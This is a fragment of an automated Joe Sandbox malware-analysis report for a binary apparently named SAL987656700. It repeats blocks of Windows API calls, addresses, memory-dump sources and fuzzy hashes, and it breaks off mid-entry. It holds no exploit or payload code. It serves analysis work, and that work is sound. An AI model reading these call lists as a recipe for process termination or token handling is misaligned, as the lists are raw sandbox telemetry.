                                      • VariantCopy.OLEAUT32(008DFA64,00000000), ref: 008DF8B1
                                      • VariantClear.OLEAUT32(?), ref: 008DF8BB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCopy$AllocInitString
                                      • String ID:
                                      • API String ID: 3859894641-0
                                      • Opcode ID: 6385dbe0f440273d7e58ed4eeab6b27758cf15db24acf1f0ef7f24b99328ba02
                                      • Instruction ID: d856ec166d3286c3ecd6dc59a419df46051723564626ffc25575ac8746618230
                                      • Opcode Fuzzy Hash: 6385dbe0f440273d7e58ed4eeab6b27758cf15db24acf1f0ef7f24b99328ba02
                                      • Instruction Fuzzy Hash: 2351F531A50314BACF20AB69D8A5B29B7A4FF45314B248567EA07DF393DB708C40E797
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • BeginPaint.USER32(?,?,?), ref: 00899241
                                      • GetWindowRect.USER32(?,?), ref: 008992A5
                                      • ScreenToClient.USER32(?,?), ref: 008992C2
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008992D3
                                      • EndPaint.USER32(?,?,?,?,?), ref: 00899321
                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008D71EA
                                        • Part of subcall function 00899339: BeginPath.GDI32(00000000), ref: 00899357
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                      • String ID:
                                      • API String ID: 3050599898-0
                                      • Opcode ID: 9e8e3946f66e24440a99711a443c37308d3a753fdd2f8358c90a818febeccad1
                                      • Instruction ID: c462daae2fb4301481ad6d1f4d2baf6c40e8d5b9b077f26fcd47ab811b230593
                                      • Opcode Fuzzy Hash: 9e8e3946f66e24440a99711a443c37308d3a753fdd2f8358c90a818febeccad1
                                      • Instruction Fuzzy Hash: B341B370208301AFDB11EF59DC94FAA7BA8FB45365F04026DF9A5C72A1D7309845EB62
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 008F080C
                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 008F0847
                                      • RtlEnterCriticalSection.NTDLL(?), ref: 008F0863
                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 008F08DC
                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 008F08F3
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 008F0921
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                      • String ID:
                                      • API String ID: 3368777196-0
                                      • Opcode ID: e335fce4c2d8d56612609cb486b3e3143a88c80ddcb1f3b1af02478e0e0d9158
                                      • Instruction ID: 7bf4930dc06f971dc894361a374821972308ff4e208a4285dbfffd4dacd010d2
                                      • Opcode Fuzzy Hash: e335fce4c2d8d56612609cb486b3e3143a88c80ddcb1f3b1af02478e0e0d9158
                                      • Instruction Fuzzy Hash: 5F415A71A14209AFDF14AF64DC85AAA7778FF04310B1480A5EE00DA297D730DE64DBA1
                                      APIs
                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,008DF3AB,00000000,?,?,00000000,?,008D682C,00000004,00000000,00000000), ref: 0091824C
                                      • EnableWindow.USER32(00000000,00000000), ref: 00918272
                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 009182D1
                                      • ShowWindow.USER32(00000000,00000004), ref: 009182E5
                                      • EnableWindow.USER32(00000000,00000001), ref: 0091830B
                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0091832F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: d8aa34aef7b6ae3a86a9866748c21530e1b59767a29967fa117895baa8834852
                                      • Instruction ID: 0ff73d3a98039005bde21e317ba12c17f9216ae7fcbaae9c1cdf39d639b36aa6
                                      • Opcode Fuzzy Hash: d8aa34aef7b6ae3a86a9866748c21530e1b59767a29967fa117895baa8834852
                                      • Instruction Fuzzy Hash: C5410670705608AFDB26CF15D899BE57BE4FB0A755F184168E5284F2B2CB71AC81EB40
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 008E4C95
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008E4CB2
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008E4CEA
                                      • _wcslen.LIBCMT ref: 008E4D08
                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 008E4D10
                                      • _wcsstr.LIBVCRUNTIME ref: 008E4D1A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                      • String ID:
                                      • API String ID: 72514467-0
                                      • Opcode ID: dde8c46ffd325e646ee26dc00b87b85a2ecefe131debad9436fd5e7c32d91733
                                      • Instruction ID: 774f3186512ba657d1b32c3d5e3544d33530c2159461e80fd4e5e8257810a5b6
                                      • Opcode Fuzzy Hash: dde8c46ffd325e646ee26dc00b87b85a2ecefe131debad9436fd5e7c32d91733
                                      • Instruction Fuzzy Hash: EC212672304245BBEB255B3AAC09E7F7B9CFF46750F149029F809CA192EA61DC00D2A1
                                      APIs
                                        • Part of subcall function 00883AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00883A97,?,?,00882E7F,?,?,?,00000000), ref: 00883AC2
                                      • _wcslen.LIBCMT ref: 008F587B
                                      • CoInitialize.OLE32(00000000), ref: 008F5995
                                      • CoCreateInstance.COMBASE(0091FCF8,00000000,00000001,0091FB68,?), ref: 008F59AE
                                      • CoUninitialize.COMBASE ref: 008F59CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 3172280962-24824748
                                      • Opcode ID: f7fd8a2fb0a5a6e5d2b36cb4846fdb8441ea3b16b3185905f7124fa1bfd02b92
                                      • Instruction ID: 2d0e96242ba677e672ed2a4a172ededd8ecab6441d5fb0b09ac3b16cd48f6883
                                      • Opcode Fuzzy Hash: f7fd8a2fb0a5a6e5d2b36cb4846fdb8441ea3b16b3185905f7124fa1bfd02b92
                                      • Instruction Fuzzy Hash: ACD153716087059FC714EF28C48092ABBE5FF89724F148859FA89DB361DB31ED45CB92
                                      APIs
                                        • Part of subcall function 008E0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008E0FCA
                                        • Part of subcall function 008E0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008E0FD6
                                        • Part of subcall function 008E0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008E0FE5
                                        • Part of subcall function 008E0FB4: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008E0FEC
                                        • Part of subcall function 008E0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008E1002
                                      • GetLengthSid.ADVAPI32(?,00000000,008E1335), ref: 008E17AE
                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008E17BA
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 008E17C1
                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 008E17DA
                                      • GetProcessHeap.KERNEL32(00000000,00000000,008E1335), ref: 008E17EE
                                      • HeapFree.KERNEL32(00000000), ref: 008E17F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                      • String ID:
                                      • API String ID: 169236558-0
                                      • Opcode ID: 546342495914fb36edf5852b3dfc4aad99019eadc61b6f745775f5b4be402145
                                      • Instruction ID: 1c4805842b9a2dabfe874ca72597a09a4996ecf0ff48d0b65105236f2889c4a2
                                      • Opcode Fuzzy Hash: 546342495914fb36edf5852b3dfc4aad99019eadc61b6f745775f5b4be402145
                                      • Instruction Fuzzy Hash: 7A11A9726A8205FFDF109FA5CC49BAE7BA9FB46759F108018F881E7214C736A940DB60
                                      APIs
                                      • GetLastError.KERNEL32(?,?,008A3379,008A2FE5), ref: 008A3390
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008A339E
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008A33B7
                                      • SetLastError.KERNEL32(00000000,?,008A3379,008A2FE5), ref: 008A3409
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: ca7a20b2680bab51f082f9c278e3c13146f9166b3eddffcd8c4f58695ab29485
                                      • Instruction ID: 6ee616bbacbf461e43c94412ee40ff93b1dfcd4d536ab5a1397611864262d871
                                      • Opcode Fuzzy Hash: ca7a20b2680bab51f082f9c278e3c13146f9166b3eddffcd8c4f58695ab29485
                                      • Instruction Fuzzy Hash: 8501247271E311BEBE6427787C85A672B94FB273793200229F520C0AF0EF114D02B144
                                      APIs
                                      • GetLastError.KERNEL32(?,?,008B5686,008C3CD6,?,00000000,?,008B5B6A,?,?,?,?,?,008AE6D1,?,00948A48), ref: 008B2D78
                                      • _free.LIBCMT ref: 008B2DAB
                                      • _free.LIBCMT ref: 008B2DD3
                                      • SetLastError.KERNEL32(00000000,?,?,?,?,008AE6D1,?,00948A48,00000010,00884F4A,?,?,00000000,008C3CD6), ref: 008B2DE0
                                      • SetLastError.KERNEL32(00000000,?,?,?,?,008AE6D1,?,00948A48,00000010,00884F4A,?,?,00000000,008C3CD6), ref: 008B2DEC
                                      • _abort.LIBCMT ref: 008B2DF2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: 3d32ca3fd856139ac462fc77e73703ad90162779b9897429da2d345f549f29fc
                                      • Instruction ID: f185f2643d38204ac1d846ec666a8c8672a3e55a589da851fc8ad7a496aa1704
                                      • Opcode Fuzzy Hash: 3d32ca3fd856139ac462fc77e73703ad90162779b9897429da2d345f549f29fc
                                      • Instruction Fuzzy Hash: BAF0C875649A046BC622373CBC0AEEA2959FFC67A5F284518F834D23D6EF2488065162
                                      APIs
                                        • Part of subcall function 00899639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00899693
                                        • Part of subcall function 00899639: SelectObject.GDI32(?,00000000), ref: 008996A2
                                        • Part of subcall function 00899639: BeginPath.GDI32(?), ref: 008996B9
                                        • Part of subcall function 00899639: SelectObject.GDI32(?,00000000), ref: 008996E2
                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00918A4E
                                      • LineTo.GDI32(?,00000003,00000000), ref: 00918A62
                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00918A70
                                      • LineTo.GDI32(?,00000000,00000003), ref: 00918A80
                                      • EndPath.GDI32(?), ref: 00918A90
                                      • StrokePath.GDI32(?), ref: 00918AA0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                      • String ID:
                                      • API String ID: 43455801-0
                                      • Opcode ID: a2f2b3692d8c34452dbec43ffd84f7627250728763ca3678504e5fd898ee9948
                                      • Instruction ID: cb8fda8d3bde00c36009196442a4b08fa2ca04164ad8a65d79b3f0eecca3a543
                                      • Opcode Fuzzy Hash: a2f2b3692d8c34452dbec43ffd84f7627250728763ca3678504e5fd898ee9948
                                      • Instruction Fuzzy Hash: AE11E576144108FFDF129F94EC88EEA7F6CEB08390F048012FA199A1A1C7719D55EBA0
                                      APIs
                                      • GetDC.USER32(00000000), ref: 008E5218
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 008E5229
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008E5230
                                      • ReleaseDC.USER32(00000000,00000000), ref: 008E5238
                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 008E524F
                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 008E5261
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 2454a815bb22edc89d2d6e7aa81e1266d3dc084ae2ab57ac166c210183a76660
                                      • Instruction ID: 1b9abf71610119290a16c45e39029a8be3aaded0efd0a3a4e8302386f3db4c3b
                                      • Opcode Fuzzy Hash: 2454a815bb22edc89d2d6e7aa81e1266d3dc084ae2ab57ac166c210183a76660
                                      • Instruction Fuzzy Hash: F50184B5B44709BBEB105BA69C49A9EBF78FB48351F048065FA04E7281D6709800DF60
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00881BF4
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00881BFC
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00881C07
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00881C12
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00881C1A
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00881C22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: 16c1cc44cfa73a163f3d4794591af7fc88826896cefd2f29628c6c2e01ec0569
                                      • Instruction ID: 43b4f5ebbae07e587a17ff093cdc11bcb602bc819a3172fc047a8a804c40baec
                                      • Opcode Fuzzy Hash: 16c1cc44cfa73a163f3d4794591af7fc88826896cefd2f29628c6c2e01ec0569
                                      • Instruction Fuzzy Hash: 1D016CB094275ABDE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008EEB30
                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008EEB46
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 008EEB55
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008EEB64
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008EEB6E
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008EEB75
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 839392675-0
                                      • Opcode ID: 999c1e9b310ea554daa40ce3d0443ba20b33e367aac32a9b737bbec789e1ca05
                                      • Instruction ID: d8269ba321d3b336a7785e02badcfc7e32522e6530474677a142580f44988d9b
                                      • Opcode Fuzzy Hash: 999c1e9b310ea554daa40ce3d0443ba20b33e367aac32a9b737bbec789e1ca05
                                      • Instruction Fuzzy Hash: E4F090B2294159BBE72157529C0DEEF3A7CEFCAB51F008158F611D1090D7A01A01D6B4
                                      APIs
                                      • GetClientRect.USER32(?), ref: 008D7452
                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 008D7469
                                      • GetWindowDC.USER32(?), ref: 008D7475
                                      • GetPixel.GDI32(00000000,?,?), ref: 008D7484
                                      • ReleaseDC.USER32(?,00000000), ref: 008D7496
                                      • GetSysColor.USER32(00000005), ref: 008D74B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                      • String ID:
                                      • API String ID: 272304278-0
                                      • Opcode ID: 9cfff0de9047ecf77a32ec82c174b8760a7e477e6fba7236faf2fecfe0d5ba70
                                      • Instruction ID: 4b83decb7dde45e624c6a0de3102081badacf3184200cfab1e24ca9c55346caf
                                      • Opcode Fuzzy Hash: 9cfff0de9047ecf77a32ec82c174b8760a7e477e6fba7236faf2fecfe0d5ba70
                                      • Instruction Fuzzy Hash: BF01AD71658219FFDB525F64DC08BEA7BB6FF04311F508164FA16A21A0CB311E41FB10
                                      APIs
                                        • Part of subcall function 00887620: _wcslen.LIBCMT ref: 00887625
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008EC6EE
                                      • _wcslen.LIBCMT ref: 008EC735
                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008EC79C
                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008EC7CA
                                      Strings
                                      Memory Dump Source
